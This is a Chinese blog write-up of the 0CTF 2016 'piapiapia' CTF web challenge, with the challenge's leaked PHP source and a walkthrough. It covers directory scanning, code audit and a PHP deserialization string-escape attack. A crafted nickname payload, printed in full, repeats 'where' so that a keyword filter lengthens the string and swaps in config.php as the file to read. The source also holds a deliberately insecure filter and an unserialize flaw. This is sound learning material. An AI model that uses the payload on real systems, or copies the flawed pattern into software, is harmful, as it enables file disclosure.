[0CTF 2016]piapiapia 1

最新推荐文章于 2024-08-14 13:00:19 发布
最新推荐文章于 2024-08-14 13:00:19 发布
阅读量1k 收藏 9
点赞数 46
分类专栏: CTF-web-wp 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ubaichu/article/details/140472428
版权

目录

题目分析

初步分析

题目是一个登录框,经过尝试没有发现sql注入,扫描目录看看
在这里插入图片描述

目录扫描

使用dirsearch,请求速度不能过块,线程设置为1,并设置每次请求间隔时间

dirsearch -e * -u url -t 1 --delay=1 --timeout=2 -x 400,403,404,500,503,429

在这里插入图片描述

/register.php
/config.php
/update.php
/www.zip
/profile.php

/register.php

访问/register.php,是注册页面,先注册一个账号登录
在这里插入图片描述
登录以后跳转到/update.php在这里插入图片描述
填完信息后,跳转到profile.php,并显示出了刚才传入的信息
在这里插入图片描述

/www.zip

访问/www.zip,得到源码

代码审计

自动审计

先使用Seay源代码审计系统自动审计,profile.php中存在任意文件读取在这里插入图片描述
全局搜索flag,config.php中存在flag在这里插入图片描述
思路明确,我们将使用profile.php中的文件读取功能读取config.php
接下来思考如何才能读取
按照刚才的初步分析,按照功能点审计代码

/index.php

<?php
    require_once('class.php');
    if($_SESSION['username']) {
        header('Location: profile.php');
        exit;
    }
    if($_POST['username'] && $_POST['password']) {
        $username = $_POST['username'];
        $password = $_POST['password'];

        if(strlen($username) < 3 or strlen($username) > 16) 
            die('Invalid user name');

        if(strlen($password) < 3 or strlen($password) > 16) 
            die('Invalid password');

        if($user->login($username, $password)) {
            $_SESSION['username'] = $username;
            header('Location: profile.php');
            exit;    
        }
        else {
            die('Invalid user name or password');
        }
    }
    else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
    <div class="container" style="margin-top:100px">  
        <form action="index.php" method="post" class="well" style="width:220px;margin:0px auto;"> 
            <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
            <h3>Login</h3>
            <label>Username:</label>
            <input type="text" name="username" style="height:30px"class="span3"/>
            <label>Password:</label>
            <input type="password" name="password" style="height:30px" class="span3">

            <button type="submit" class="btn btn-primary">LOGIN</button>
        </form>
    </div>
</body>
</html>
<?php
    }
?>

登录界面,登录完会跳到profile.php

/profile.php

<?php
    require_once('class.php');
    if($_SESSION['username'] == null) {
        die('Login First');    
    }
    $username = $_SESSION['username'];
    $profile=$user->show_profile($username);
    if($profile  == null) {
        header('Location: update.php');
    }
    else {
        $profile = unserialize($profile);
        $phone = $profile['phone'];
        $email = $profile['email'];
        $nickname = $profile['nickname'];
        $photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
    <div class="container" style="margin-top:100px">  
        <img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
        <h3>Hi <?php echo $nickname;?></h3>
        <label>Phone: <?php echo $phone;?></label>
        <label>Email: <?php echo $email;?></label>
    </div>
</body>
</html>
<?php
    }
?>

应为我们刚才已经输入过电话,邮箱等信息,所以不会跳到update.php界面
存在反序列化,思路是控制构造序列化字符串,给$profile[‘photo’]赋值,从而达到文件读取的目的
接下来分析update.php

/update.php

<?php
    require_once('class.php');
    if($_SESSION['username'] == null) {
        die('Login First');    
    }
    if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

        $username = $_SESSION['username'];
        if(!preg_match('/^\d{11}$/', $_POST['phone']))
            die('Invalid phone');

        if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
            die('Invalid email');
        
        if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
            die('Invalid nickname');

        $file = $_FILES['photo'];
        if($file['size'] < 5 or $file['size'] > 1000000)
            die('Photo size error');

        move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
        $profile['phone'] = $_POST['phone'];
        $profile['email'] = $_POST['email'];
        $profile['nickname'] = $_POST['nickname'];
        $profile['photo'] = 'upload/' . md5($file['name']);

        $user->update_profile($username, serialize($profile));
        echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
    }
    else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>UPDATE</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
    <div class="container" style="margin-top:100px">  
        <form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> 
            <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
            <h3>Please Update Your Profile</h3>
            <label>Phone:</label>
            <input type="text" name="phone" style="height:30px"class="span3"/>
            <label>Email:</label>
            <input type="text" name="email" style="height:30px"class="span3"/>
            <label>Nickname:</label>
            <input type="text" name="nickname" style="height:30px" class="span3">
            <label for="file">Photo:</label>
            <input type="file" name="photo" style="height:30px"class="span3"/>
            <button type="submit" class="btn btn-primary">UPDATE</button>
        </form>
    </div>
</body>
</html>
<?php
    }
?>

使用四个正则表达式对参数进行过滤,第三个过滤对长度:strlen($_POST[‘nickname’]) > 10
可以传入数组的方式来绕过长度限制
photo的值我们刚传入文件的路径,我们的思路是将它的的值改为config.php
将四个参数经过序列化后,调用了user的update_profile()函数
通过全局搜索,该函数在class.php中

/class.php

<?php
require('config.php');

class user extends mysql{
    private $table = 'users';

    public function is_exists($username) {
        $username = parent::filter($username);

        $where = "username = '$username'";
        return parent::select($this->table, $where);
    }
    public function register($username, $password) {
        $username = parent::filter($username);
        $password = parent::filter($password);

        $key_list = Array('username', 'password');
        $value_list = Array($username, md5($password));
        return parent::insert($this->table, $key_list, $value_list);
    }
    public function login($username, $password) {
        $username = parent::filter($username);
        $password = parent::filter($password);

        $where = "username = '$username'";
        $object = parent::select($this->table, $where);
        if ($object && $object->password === md5($password)) {
            return true;
        } else {
            return false;
        }
    }
    public function show_profile($username) {
        $username = parent::filter($username);

        $where = "username = '$username'";
        $object = parent::select($this->table, $where);
        return $object->profile;
    }
    public function update_profile($username, $new_profile) {
        $username = parent::filter($username);
        $new_profile = parent::filter($new_profile);

        $where = "username = '$username'";
        return parent::update($this->table, 'profile', $new_profile, $where);
    }
    public function __tostring() {
        return __class__;
    }
}

class mysql {
    private $link = null;

    public function connect($config) {
        $this->link = mysql_connect(
            $config['hostname'],
            $config['username'], 
            $config['password']
        );
        mysql_select_db($config['database']);
        mysql_query("SET sql_mode='strict_all_tables'");

        return $this->link;
    }

    public function select($table, $where, $ret = '*') {
        $sql = "SELECT $ret FROM $table WHERE $where";
        $result = mysql_query($sql, $this->link);
        return mysql_fetch_object($result);
    }

    public function insert($table, $key_list, $value_list) {
        $key = implode(',', $key_list);
        $value = '\'' . implode('\',\'', $value_list) . '\''; 
        $sql = "INSERT INTO $table ($key) VALUES ($value)";
        return mysql_query($sql);
    }

    public function update($table, $key, $value, $where) {
        $sql = "UPDATE $table SET $key = '$value' WHERE $where";
        return mysql_query($sql);
    }

    public function filter($string) {
        $escape = array('\'', '\\\\');
        $escape = '/' . implode('|', $escape) . '/';
        $string = preg_replace($escape, '_', $string);

        $safe = array('select', 'insert', 'update', 'delete', 'where');
        $safe = '/' . implode('|', $safe) . '/i';
        return preg_replace($safe, 'hacker', $string);
    }
    public function __tostring() {
        return __class__;
    }
}
session_start();
$user = new user();
$user->connect($config);

有两个类,user继承了mysql
找到update_profile()函数,其中调用mysql类中的filter()函数和update()函数

public function update_profile($username, $new_profile) {
        $username = parent::filter($username);
        $new_profile = parent::filter($new_profile);

        $where = "username = '$username'";
        return parent::update($this->table, 'profile', $new_profile, $where);
    }

filter()函数:

    public function filter($string) {
        $escape = array('\'', '\\\\');
        $escape = '/' . implode('|', $escape) . '/';
        $string = preg_replace($escape, '_', $string);

        $safe = array('select', 'insert', 'update', 'delete', 'where');
        $safe = '/' . implode('|', $safe) . '/i';
        return preg_replace($safe, 'hacker', $string);

过滤函数,如果参数中存在(‘select’, ‘insert’, ‘update’, ‘delete’, ‘where’),替换为"hacker"
“where"替换"hack”,字符串增多,我们可以利用字符串逃逸,将phpto的值变为我们想要的
update()函数:

public function update($table, $key, $value, $where) {
        $sql = "UPDATE $table SET $key = '$value' WHERE $where";
        return mysql_query($sql);
    }

将数据库中储存的值更新

字符串逃逸

字符串减少

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

字符串增多

在这里插入图片描述

在这里插入图片描述

本题序列化内容构造

先构造一个正常的序列化内容
因为nickname有长度限制,我们把它的类型改为数组来绕过在这里插入图片描述

O:4:"user":4:{s:6:"pohone";s:11:"15288888888";s:5:"email";s:16:"888888888@qq.com";s:8:"neckname";a:0:{}s:5:"photo";s:5:"1.jpg";}

";}s:5:“photo”;s:10:“config.php”;}的长度为34,所以需要输入34个where
最终构造出的序列化内容为

O:4:"user":4:{s:6:"pohone";s:11:"15288888888";s:5:"email";s:16:"888888888@qq.com";s:8:"neckname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:5:"1.jpg";}

nickname的值为:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

解题过程

思路

/update.php————》传入构造的neckname的值————》filter()函数替换后发生字符串增多的字符串逃逸————》photo的值改变为config.php————》存入数据库中
————》profile.php从数据库中拿到photo的值————》执行file_get_contents($profile['photo'])————得到flag

解题过程

/register.php页面注册一个账号,登录后跳转到update.php页面
抓update.php的包,构造nickname的值在这里插入图片描述
访问profile.php,查看页面源代码在这里插入图片描述
base64解码后得到flag在这里插入图片描述

白初&
关注
  • 46
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[0CTF 2016] piapiapia 题解
lonmar的博客
01-27 723
反序列化字符逃逸
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
[0CTF 2016]piapiapia
m0_63253040的博客
09-25 1065
这里因为s:31:"";s:10:"config.php",要取31位会把config.php当做值,所以我们要在前面加上31个where使其被过滤替换成hacker多一个字符以满足这31个字符。但是正常情况下是不能让photo的值是config.php的,所以我们利用nickname去构造一个config.php出来,但是因为nickname只要匹配到a-zA-Z0-9_就会die,所以这里需要用数组绕过。}s:5:"好像没有和最前方的"对齐,经最终测试,是不影响的。
[0CTF 2016]piapiapia(反序列化逃逸)
paidx0
09-02 732
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
web buuctf [0CTF 2016]piapiapia
weixin_44214568的博客
04-11 829
知识点:1.反序列化字符串逃逸 1.开题 2.常规操作,看源码,查看robots.txt,disearch扫描 抓包,用常规的sql注入测试了一下,没啥效果,disearch扫描也结束了,看了下disearch扫描 有文件www.zip,是源码的一个包,下载下来 3.查看源码,没有路由文件,从index.php看,加载了config.php(里面有flag值),profile.php(会话已经加载的情况下读取信息),都看了一下文件,register.php(注册),注册了一个账号试了试,链
[0CTF 2016]piapiapia(反序列化逃逸)
羽的博客
03-01 3153
通过扫描后台目录获得了源码(www.zip)。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: 1 index.php,register.php: 这两个个是登录页面和注册页面,要求我们输入的用户名和密码的长度都在3-16内。 2 class.php: 在class.php中我们发现了过...
[0ctf2016]piapiapia
ro4lsc的博客
05-07 6964
[0ctf2016]piapiapia(PHP unserialize字符逃逸) 前言 由于自己还没接触过太多这类的题目,所以还是总结网上的WP进行复现,会尽可能写的清晰,那么话不多说,开始淦 首先使用了dirsearch扫了一下目录(网站源码泄漏www.zip) dirsearch -u "http://62bfe127-e775-4795-bf16-8cc039c1e9ab.node3.buu...
[0CTF 2016]piapiapia WP
shayebudon的博客
12-09 482
打开题目扫描一下发现wwww.zip文件下载 下载后可以看到 打开文件,查看内容,敏感处 profile.php有两处: unserialize和file_get_contents。 update.php的serialize 查看参数是怎么传到file_get_contents中 在profile.php中,是$profile数组里健名为photo的键值 $profile是通过show_profile函数传入,传入了username参数 show_profi...
BUUCTF-WEB0CTF 2016piapiapia 1
qq_36410265的博客
12-27 1894
BUUCTF-WEB0CTF 2016piapiapia 1
2016华山杯ctf安卓题目
06-17
【标题】2016华山杯CTF(Capture The Flag)是一场专注于网络安全竞技的赛事,其中的安卓题目展示了该领域内的各种挑战与技术深度。CTF比赛通常包括逆向工程、密码学、Web安全、移动安全等多个方向,而安卓题目则...
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
2021 N1CTF CTF 真题.zip
12-07
2021 N1CTF CTF 真题
文件上传-.user.ini利用
feiwujiushiwo的博客
08-13 175
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 314
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
思科RIP动态路由配置3
最新发布
2302_76730689的博客
08-14 455
路由信息协议(Routing Information Protocol,RIP)是应用较早、使用较普遍的动态路由协议,也是内部网关协议,由于RIP以跳数作为衡量路径的开销,且规定最大跳数为15,因此RIP在实际应用中是有一定限制的,通常适用于中小型的企业网络。Router-A(config-router)#network 网段!#9查看Switch-A、Router-A、Router-B的路由表。#3配置Router-A的名称及其接口IP地址。#7在Router-A上配置动态RIP。
PHP图书借阅微信小程序系统源码
2401_84414018的博客
08-12 194
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
贷齐乐系统sql注入漏洞
banliyaoguai的博客
08-12 408
然后在这里取值的时候.和_会区分开,然后我们可以在第一个i_d写我们的payload,在i.d写正常数据用来绕过waf。可以使用使用php小特性和全局污染绕过,在这里的时候会将.转换成下划线,然后桡骨第一个waf。这里由于等号被过滤乐所以使用like,然后查表名的时候由于'被过滤所以使用了16进制编码。首先php在遇到两个相同名字参数时,php是取后一个的,如下图最终i_d的值为1。代码先走这里将输入的数据进行过滤。然后再继续往下走,再进行一个查询。然后继续往下,用=进行分割。
代码随想录算法训练营Day35 | 01背包问题 | 416. 分割等和子集
wonderlandlja的博客
08-10 246
【代码】代码随想录算法训练营Day35 | 01背包问题 | 416. 分割等和子集。
ctf从0到1电子书
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值